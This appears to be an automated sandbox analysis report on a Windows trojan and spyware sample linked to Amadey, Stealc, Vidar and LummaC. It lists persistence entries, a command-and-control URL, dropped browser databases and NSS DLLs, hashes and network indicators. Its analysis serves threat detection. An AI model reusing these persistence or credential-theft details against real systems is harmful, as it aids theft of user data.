Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@47/63@7/11
EGA Information:	Successful, ratio: 75%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 172.217.21.35, 172.217.19.238, 64.233.162.84, 172.217.17.78, 142.250.181.99, 199.232.214.172, 172.217.19.170, 172.217.19.234, 142.250.181.42, 142.250.181.74, 142.250.181.106, 172.217.19.202, 172.217.17.42, 172.217.17.74, 142.250.181.138, 216.58.208.234
Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, accounts.google.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, ogads-pa.googleapis.com, time.windows.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, redirector.gvt1.com, clients.l.google.com, www.gstatic.com
Execution Graph export aborted for target file.exe, PID 6564 because there are no executed function
HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
08:10:10	API Interceptor	242x Sleep call for process: file.exe modified
08:11:02	API Interceptor	402x Sleep call for process: skotes.exe modified
08:11:19	API Interceptor	17x Sleep call for process: qk4EiZw.exe modified
08:11:28	API Interceptor	2x Sleep call for process: 9faf801df7.exe modified
12:58:58	Task Scheduler	Run new task: {895426D7-35E1-4C5A-ADC5-E9DAE2EE71E0} path: .
14:10:38	Task Scheduler	Run new task: skotes path: C:\Users\user~1\AppData\Local\Temp\abc3bc1985\skotes.exe
14:11:20	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msedge.lnk
14:11:34	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 9faf801df7.exe C:\Users\user~1\AppData\Local\Temp\1012942001\9faf801df7.exe
14:11:43	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 0fb4fa91ba.exe C:\Users\user~1\AppData\Local\Temp\1012943001\0fb4fa91ba.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.215.113.43	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
atten-supporse.biz	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.165.166
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.165.166
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.165.166
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.165.166
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.9
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.9
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.165.166
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.9
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	104.21.16.9
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.9
www3.l.google.com	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	142.250.181.142
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	142.250.181.142
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	142.250.181.142
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	142.250.181.142
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	172.217.19.206
	Distribution Agreement -21_12_48-December 6, 2024-be1f31b3a4b24beb88d27adfd723203e.pdf	Get hash	malicious	Unknown	Browse	142.250.181.142
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	172.217.19.206
	https://inovamora.com/team/index.html	Get hash	malicious	HTMLPhisher	Browse	142.250.181.142
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	142.250.181.142
	file.exe	Get hash	malicious	Credential Flusher	Browse	172.217.19.238

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
SUNHK-DATA-AS-APSunNetworkHongKongLimited-HongKong	file.exe	Get hash	malicious	XWorm	Browse	112.213.116.149
	arm5.elf	Get hash	malicious	Unknown	Browse	117.19.102.86
	jew.ppc.elf	Get hash	malicious	Unknown	Browse	112.213.114.230
	botx.mpsl.elf	Get hash	malicious	Mirai	Browse	117.19.113.75
	wFg25zfjIL.dll	Get hash	malicious	Unknown	Browse	103.45.64.91
	wFg25zfjIL.dll	Get hash	malicious	Unknown	Browse	103.45.64.91
	LSQz1xnW54.exe	Get hash	malicious	Unknown	Browse	103.45.64.91
	http://kklk16.bsyo45ksda.top	Get hash	malicious	Unknown	Browse	121.127.231.212
	botnet.m68k.elf	Get hash	malicious	Mirai, Moobot	Browse	103.12.151.132
	la.bot.arm.elf	Get hash	malicious	Unknown	Browse	112.213.108.9
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	LummaC Stealer	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC Stealer	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.206
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC Stealer	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	LummaC Stealer	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC Stealer	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.206
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC Stealer	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
28a2c9bd18a11de089ef85a160da29e4	file.exe	Get hash	malicious	LummaC Stealer	Browse	52.149.20.212 13.107.246.63 23.32.185.164
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	52.149.20.212 13.107.246.63 23.32.185.164
	file.exe	Get hash	malicious	LummaC Stealer	Browse	52.149.20.212 13.107.246.63 23.32.185.164
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	52.149.20.212 13.107.246.63 23.32.185.164
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	52.149.20.212 13.107.246.63 23.32.185.164
	file.exe	Get hash	malicious	LummaC Stealer	Browse	52.149.20.212 13.107.246.63 23.32.185.164
	http://liathletic.com	Get hash	malicious	Unknown	Browse	52.149.20.212 13.107.246.63 23.32.185.164
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	52.149.20.212 13.107.246.63 23.32.185.164
	file.exe	Get hash	malicious	LummaC Stealer	Browse	52.149.20.212 13.107.246.63 23.32.185.164
	https://m.frownpasture.top/xqbgOoR7LyCdyD4DEHLii/a8f4AAdjCXhECXlkXzJZXUg0VwwMXxcvBW8NcRstA0McXyNaQkY?_t=1733539511823#	Get hash	malicious	Unknown	Browse	52.149.20.212 13.107.246.63 23.32.185.164
a0e9f5d64349fb13191bc781f81f42e1	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.9
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.9
	file.exe	Get hash	malicious	XWorm	Browse	104.21.16.9
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.9
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.9
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.9
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.9
	Note no. ROC 2453-2024.doc	Get hash	malicious	Unknown	Browse	104.21.16.9
	Outstanding_Payment.vbs	Get hash	malicious	XenoRAT	Browse	104.21.16.9
	Outstanding_Payment.vbs_.vbs	Get hash	malicious	XenoRAT	Browse	104.21.16.9

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\freebl3.dll	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse

Created / dropped Files

C:\ProgramData\BKJKJEHJJDAKECBFCGIDBGCAEG

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.03786218306281921
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWB2IGKhNbxrO3Dpvu2HI:58r54w0VW3xWB2ohFQ3Y2
MD5:	4BB4A37B8E93E9B0F5D3DF275799D45E
SHA1:	E27DF7CC49B0D145140C119A99C1BBAA9ECCE8F7
SHA-256:	89BC0F21671C244C40A9EA42893B508858AD6E1E26AC16F2BD507C3E8CBB3CF7
SHA-512:	F2FC9067EF11DC3B719507B97C76A19B9E976D143A2FD11474B8D2A2848A706AFCA316A95FEEBA644099497A95E1C426CDAB923D5A70619018E1543FEF3182DB
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\EBAKFIIJ

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.137181696973627
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
MD5:	2D903A087A0C793BDB82F6426B1E8EFB
SHA1:	E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
SHA-256:	AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
SHA-512:	90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\IJDBGDGCGDAKFIDGIDBF

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\IJKKEHJDHJKFIECAAKFIJJKJKF

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\JDHCBAEHJJJKKFIDGHJE

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with very long lines (1769), with CRLF line terminators
Category:	dropped
Size (bytes):	9370
Entropy (8bit):	5.514140640374404
Encrypted:	false
SSDEEP:	192:lLnSRkPYbBp6tqUCaXr6V6kHNBw8D3nSl:NeqqUWpPwK0
MD5:	7E44458E0A8A3A7D10875BC3B7AE72D1
SHA1:	E5E6AC8676EE3761DAB13A10EB7573C19F48D297
SHA-256:	21A04E176A9CEBDA60AE6FD82A7495C6E0867ED02B8009A44DDC9863E14D8753
SHA-512:	012ED6CDC0802AA1063EFE841549341CC86EB626A26FC4BDC509598D8E33093296510344A2CC4419B007F6191F3445DA8F0AAE3B1626E54C1EF66DDDF3FA59B1
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "27fb6245-bd08-4de6-8f4d-2ece3f597752");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696491690);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696491694);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\JEBKEHJJDAAAAKECBGHD

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\JJJJEBGD

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1215420383712111
Encrypted:	false
SSDEEP:	384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
MD5:	9A809AD8B1FDDA60760BB6253358A1DB
SHA1:	D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
SHA-256:	95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
SHA-512:	2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\2173e7be-c3a6-4daf-b4db-e90aa81c49c2.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	modified
Size (bytes):	44691
Entropy (8bit):	6.0945642127335935
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4klrKKGf4WxreoGDxEpFWEoN7DRo+yM/42cRaLMoskCH:z/Ps+wsI7ynuxKN7VLyMV/YoskFoz
MD5:	303BADDF85791473A5DF0AC677703AD0
SHA1:	645E3E75B59FCB3C0E5041EE6E109F0C305514F6
SHA-256:	D2E6507C7126F7AECD9C803904E56E6C5FD891FCD2108243674E4BEC00D70CD8
SHA-512:	182D9FA98F9E97F848CE3C90A08A4EA1D3767A3501AD2A65BE681E59ED446465F0FC0670620882C6B6EB577886919D31FA85108A0A347ACFD35E2440B5394337
Malicious:	false
